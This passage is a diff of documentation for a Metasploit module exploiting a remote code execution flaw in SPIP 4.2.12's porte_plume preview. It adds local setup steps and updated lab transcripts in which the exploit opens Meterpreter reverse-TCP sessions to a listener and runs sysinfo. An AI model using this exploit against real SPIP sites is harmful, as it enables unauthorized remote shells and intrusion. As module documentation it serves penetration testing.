@@ -53,6 +53,19 @@ networks:
53
53
driver : bridge
54
54
` ` `
55
55
56
+ ### Non-Docker Setup
57
+
58
+ If you prefer not to use Docker, you can manually set up SPIP with the following commands:
59
+
60
+ ` ` ` bash
61
+ wget https://files.spip.net/spip/archives/spip-v4.2.12.zip
62
+ unzip spip-v4.2.12.zip
63
+ cd spip-v4.2.12
64
+ php -S 0.0.0.0:8000
65
+ ```
66
+
67
+ Accessible at ` http://localhost:8000 ` .
68
+
56
69
## Verification Steps
57
70
58
71
1 . Set up a SPIP instance with the specified Docker environment.
@@ -95,40 +108,43 @@ exploit
95
108
With ` php/meterpreter/reverse_tcp ` :
96
109
97
110
```
98
- msf6 exploit(multi/http/spip_porte_plume_previsu_rce) > exploit rhosts=127.0.0.1 rport=8880 AutoCheck=false
111
+ msf6 exploit(multi/http/spip_porte_plume_previsu_rce) > exploit rhosts=127.0.0.1 rport=8000
99
112
100
113
[*] Started reverse TCP handler on 192.168.1.36:4444
101
- [!] AutoCheck is disabled, proceeding with exploitation
114
+ [*] Running automatic check ("set AutoCheck false" to disable)
115
+ [*] SPIP Version detected: 4.2.12
116
+ [+] The target appears to be vulnerable. The detected SPIP version (4.2.12) is vulnerable.
117
+ [*] Preparing to send exploit payload to the target...
102
118
[*] Sending exploit payload to the target...
103
- [*] Sending stage (39927 bytes) to 172.23.0.3
104
- [*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.23.0.3:35902 ) at 2024-08-10 21:56:50 +0200
119
+ [*] Sending stage (39927 bytes) to 192.168.1.36
120
+ [*] Meterpreter session 2 opened (192.168.1.36:4444 -> 192.168.1.36:56534 ) at 2024-08-19 19:43:18 +0200
105
121
106
- meterpreter > sysinfo
107
- Computer : 5d309f4bdfbe
108
- OS : Linux 5d309f4bdfbe 5.15.0-113-generic #123-Ubuntu SMP Mon Jun 10 08:16:17 UTC 2024 x86_64
122
+ meterpreter > sysinfo
123
+ Computer : linux
124
+ OS : Linux linux 5.15.0-113-generic #123-Ubuntu SMP Mon Jun 10 08:16:17 UTC 2024 x86_64
109
125
Meterpreter : php/linux
110
- meterpreter >
111
126
```
112
127
113
128
With ` cmd/linux/http/x64/meterpreter/reverse_tcp ` :
114
129
115
130
```
116
- msf6 exploit(multi/http/spip_porte_plume_previsu_rce) > exploit rhosts=127.0.0.1 rport=8880 AutoCheck=false
131
+ msf6 exploit(multi/http/spip_porte_plume_previsu_rce) > exploit rhosts=127.0.0.1 rport=8000
117
132
118
133
[*] Started reverse TCP handler on 192.168.1.36:4444
119
- [!] AutoCheck is disabled, proceeding with exploitation
134
+ [*] Running automatic check ("set AutoCheck false" to disable)
135
+ [*] SPIP Version detected: 4.2.12
136
+ [+] The target appears to be vulnerable. The detected SPIP version (4.2.12) is vulnerable.
120
137
[*] Preparing to send exploit payload to the target...
121
138
[*] Sending exploit payload to the target...
122
- [*] Sending stage (3045380 bytes) to 172.23.0.3
123
- [*] Meterpreter session 3 opened (192.168.1.36:4444 -> 172.23.0.3:38992 ) at 2024-08-10 22:10:19 +0200
139
+ [*] Sending stage (3045380 bytes) to 192.168.1.36
140
+ [*] Meterpreter session 3 opened (192.168.1.36:4444 -> 192.168.1.36:59106 ) at 2024-08-19 19:44:40 +0200
124
141
125
142
meterpreter > sysinfo
126
- Computer : 172.23.0.3
127
- OS : Debian 11.9 (Linux 5.15.0-113-generic)
143
+ Computer : 192.168.1.36
144
+ OS : LinuxMint 21.3 (Linux 5.15.0-113-generic)
128
145
Architecture : x64
129
146
BuildTuple : x86_64-linux-musl
130
147
Meterpreter : x64/linux
131
- meterpreter >
132
148
```
133
149
134
150
- The module successfully exploits the vulnerability and opens a Meterpreter session on the target.
0 commit comments